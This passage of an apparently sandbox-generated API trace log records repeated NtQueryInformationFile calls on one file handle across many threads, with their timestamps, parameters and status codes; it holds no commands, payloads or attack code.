[0153.247] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f8a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f8a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1054 os_tid = 0x710 [0153.249] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bff50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bff50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1055 os_tid = 0x5d8 [0153.251] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f9c0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f9c0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1056 os_tid = 0xbe4 [0153.252] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f960, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f960, FileInformation=0x44d8098) returned 0x0 Thread: id = 1057 os_tid = 0x600 [0153.254] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fdb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fdb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1058 os_tid = 0xbd0 [0153.256] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efb18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efb18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1059 os_tid = 0x158 [0153.257] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f910, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f910, FileInformation=0x44d8098) returned 0x0 Thread: id = 1060 os_tid = 0xbd8 [0153.259] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f800, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f800, FileInformation=0x44d8098) returned 0x0 Thread: id = 1061 os_tid = 0xbe8 [0153.260] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47eff70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47eff70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1062 os_tid = 0xbdc [0153.262] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fed0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fed0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1063 os_tid = 0x5b4 [0153.264] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48efcf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48efcf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1064 os_tid = 0x614 [0153.265] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fef8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fef8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1065 os_tid = 0x690 [0153.267] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef7a8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef7a8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1066 os_tid = 0xa68 [0153.269] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fa78, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fa78, FileInformation=0x44d8098) returned 0x0 Thread: id = 1067 os_tid = 0x7d0 [0153.271] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fb90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fb90, FileInformation=0x44d8098) returned 0x0 Thread: id = 1068 os_tid = 0x7d8 [0153.273] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfc30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfc30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1069 os_tid = 0x24c [0153.274] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434ff00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434ff00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1070 os_tid = 0x9f8 [0153.276] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bf9b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bf9b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1071 os_tid = 0x798 [0153.278] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fb50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fb50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1072 os_tid = 0xa3c [0153.279] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fbf8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fbf8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1073 os_tid = 0x8c0 [0153.281] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f980, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f980, FileInformation=0x44d8098) returned 0x0 Thread: id = 1074 os_tid = 0x708 [0153.283] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f850, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f850, FileInformation=0x44d8098) returned 0x0 Thread: id = 1075 os_tid = 0xa64 [0153.285] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485ff18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485ff18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1076 os_tid = 0xa30 [0153.286] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47aff40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47aff40, FileInformation=0x44d8098) returned 0x0 Thread: id = 1077 os_tid = 0x388 [0153.288] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f9b0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f9b0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1078 os_tid = 0x760 [0153.290] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff7e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff7e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1079 os_tid = 0xa54 [0153.291] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afbd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afbd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1080 os_tid = 0x738 [0153.293] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fd00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fd00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1081 os_tid = 0x488 [0153.295] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f790, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f790, FileInformation=0x44d8098) returned 0x0 Thread: id = 1082 os_tid = 0x6dc [0153.297] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fa58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fa58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1083 os_tid = 0x7a0 [0153.298] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fc08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fc08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1084 os_tid = 0x73c [0153.301] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fbd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fbd8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1085 os_tid = 0x1c0 [0153.303] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efc30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efc30, FileInformation=0x44d8098) returned 0x0 Thread: id = 1086 os_tid = 0x7c4 [0153.305] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48ef840, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48ef840, FileInformation=0x44d8098) returned 0x0 Thread: id = 1087 os_tid = 0x790 [0153.306] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fdd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fdd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1088 os_tid = 0x688 [0153.308] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fb20, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fb20, FileInformation=0x44d8098) returned 0x0 Thread: id = 1089 os_tid = 0x240 [0153.310] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47aff18, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47aff18, FileInformation=0x44d8098) returned 0x0 Thread: id = 1090 os_tid = 0x8e0 [0153.311] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffeb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffeb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1091 os_tid = 0x880 [0153.313] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fef8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fef8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1092 os_tid = 0x8f0 [0153.314] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffef8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffef8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1093 os_tid = 0xa18 [0153.317] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fcc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fcc8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1094 os_tid = 0x8a0 [0153.319] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47aff60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47aff60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1095 os_tid = 0x870 [0153.320] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afd08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afd08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1096 os_tid = 0x9a0 [0153.322] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f9b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f9b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1097 os_tid = 0x2c4 [0153.323] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfae0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfae0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1098 os_tid = 0x890 [0153.325] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fea8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fea8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1099 os_tid = 0x4e8 [0153.327] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f878, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f878, FileInformation=0x44d8098) returned 0x0 Thread: id = 1100 os_tid = 0xcc [0153.328] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47fff58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47fff58, FileInformation=0x44d8098) returned 0x0 Thread: id = 1101 os_tid = 0xd0 [0153.330] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fbe0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fbe0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1102 os_tid = 0xd4 [0153.332] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fd40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fd40, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1103 os_tid = 0xd8 [0153.333] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efa50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efa50, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1104 os_tid = 0xdc [0153.335] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afed8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afed8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1105 os_tid = 0xe0 [0153.337] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fdf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fdf0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1106 os_tid = 0xe4 [0153.338] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfe48, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfe48, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1107 os_tid = 0xe8 [0153.340] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fb28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fb28, FileInformation=0x44d8098) returned 0x0 Thread: id = 1108 os_tid = 0xec [0153.341] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fe58, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fe58, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1109 os_tid = 0x748 [0153.343] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f860, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f860, FileInformation=0x44d8098) returned 0x0 Thread: id = 1110 os_tid = 0xc4 [0153.345] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fda0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fda0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1111 os_tid = 0x620 [0153.346] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef7f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef7f0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1112 os_tid = 0x910 [0153.348] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef998, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef998, FileInformation=0x44d8098) returned 0x0 Thread: id = 1113 os_tid = 0x950 [0153.349] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfcd0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfcd0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1114 os_tid = 0x940 [0153.351] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efa98, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efa98, FileInformation=0x44d8098) returned 0x0 Thread: id = 1115 os_tid = 0x980 [0153.353] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fe08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fe08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1116 os_tid = 0xa10 [0153.354] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fa00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fa00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1117 os_tid = 0x72c [0153.356] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fc38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fc38, FileInformation=0x44d8098) returned 0x0 Thread: id = 1118 os_tid = 0x9e0 [0153.358] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f958, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f958, FileInformation=0x44d8098) returned 0x0 Thread: id = 1119 os_tid = 0x9c4 [0153.359] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fc60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fc60, FileInformation=0x44d8098) returned 0x0 Thread: id = 1120 os_tid = 0xa6c [0153.361] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fec8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fec8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1121 os_tid = 0xb00 [0153.363] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff9a0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff9a0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1122 os_tid = 0xaf8 [0153.365] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f868, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f868, FileInformation=0x44d8098) returned 0x0 Thread: id = 1123 os_tid = 0xae4 [0153.366] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432f7e0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432f7e0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1124 os_tid = 0x344 [0153.368] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fcd8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fcd8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1125 os_tid = 0x808 [0153.369] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff9b8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff9b8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1126 os_tid = 0x858 [0153.371] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fca0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fca0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1127 os_tid = 0x224 [0153.372] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fb90, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fb90, FileInformation=0x44d8098) returned 0x0 Thread: id = 1128 os_tid = 0x4dc [0153.374] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efcb0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efcb0, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1129 os_tid = 0x78c [0153.375] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42eff50, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42eff50, FileInformation=0x44d8098) returned 0x0 Thread: id = 1130 os_tid = 0xb0 [0153.377] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afb28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afb28, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1131 os_tid = 0x314 [0153.379] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fbc0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fbc0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1132 os_tid = 0x804 [0153.381] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f980, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f980, FileInformation=0x44d8098) returned 0x0 Thread: id = 1133 os_tid = 0x854 [0153.382] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fdb8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fdb8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1134 os_tid = 0xa78 [0153.385] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fa40, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fa40, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1135 os_tid = 0x6a8 [0153.399] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fb08, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fb08, FileInformation=0x44d8098) returned 0x0 Thread: id = 1136 os_tid = 0x7a8 [0153.404] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f7f8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f7f8, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1137 os_tid = 0x330 [0153.406] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f878, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f878, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1138 os_tid = 0x3a4 [0153.408] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48eff28, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48eff28, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1139 os_tid = 0x67c [0153.410] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f8d0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f8d0, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1140 os_tid = 0x5cc [0153.411] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fb68, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fb68, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1141 os_tid = 0x840 [0153.413] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fea0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fea0, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1142 os_tid = 0x69c [0153.414] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fd10, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fd10, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1143 os_tid = 0x6f0 [0153.416] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efb00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efb00, FileInformation=0x44d8098) returned 0xc000000d Thread: id = 1144 os_tid = 0x810 [0153.418] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fac0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fac0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1145 os_tid = 0xa88 [0153.419] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fb70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fb70, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1146 os_tid = 0x43c [0153.420] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfda8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfda8, FileInformation=0x44d8098) returned 0x0 Thread: id = 1147 os_tid = 0x670 [0153.422] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfb80, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfb80, FileInformation=0x44d8098) returned 0x0 Thread: id = 1148 os_tid = 0xa14 [0153.424] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fc70, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fc70, FileInformation=0x44d8098) returned 0x0 Thread: id = 1149 os_tid = 0x990 [0153.426] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfaf0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfaf0, FileInformation=0x44d8098) returned 0x0 Thread: id = 1150 os_tid = 0x2dc [0153.428] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afdc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afdc8, FileInformation=0x44d8098) returned 0xc0000003 Thread: id = 1151 os_tid = 0x74c [0153.429] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f8f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f8f0, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1152 os_tid = 0x3c4 [0153.431] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fe60, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fe60, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1153 os_tid = 0x90 [0153.432] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f808, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f808, FileInformation=0x44d8098) returned 0x0 Thread: id = 1154 os_tid = 0x630 [0153.434] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fbc8, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fbc8, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1155 os_tid = 0x124 [0153.436] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfd30, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfd30, FileInformation=0x44d8098) returned 0xc0000002 Thread: id = 1156 os_tid = 0xc0 [0153.437] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486ff00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486ff00, FileInformation=0x44d8098) returned 0x0 Thread: id = 1157 os_tid = 0x360 [0153.439] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x492fc00, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x492fc00, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1158 os_tid = 0x920 [0153.441] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f8f0, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f8f0, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1159 os_tid = 0xbec [0153.443] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486fb38, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486fb38, FileInformation=0x44d8098) returned 0xc0000010 Thread: id = 1160 os_tid = 0x6b8 [0153.444] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f890, FileInformation=0x44d8098, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f890, 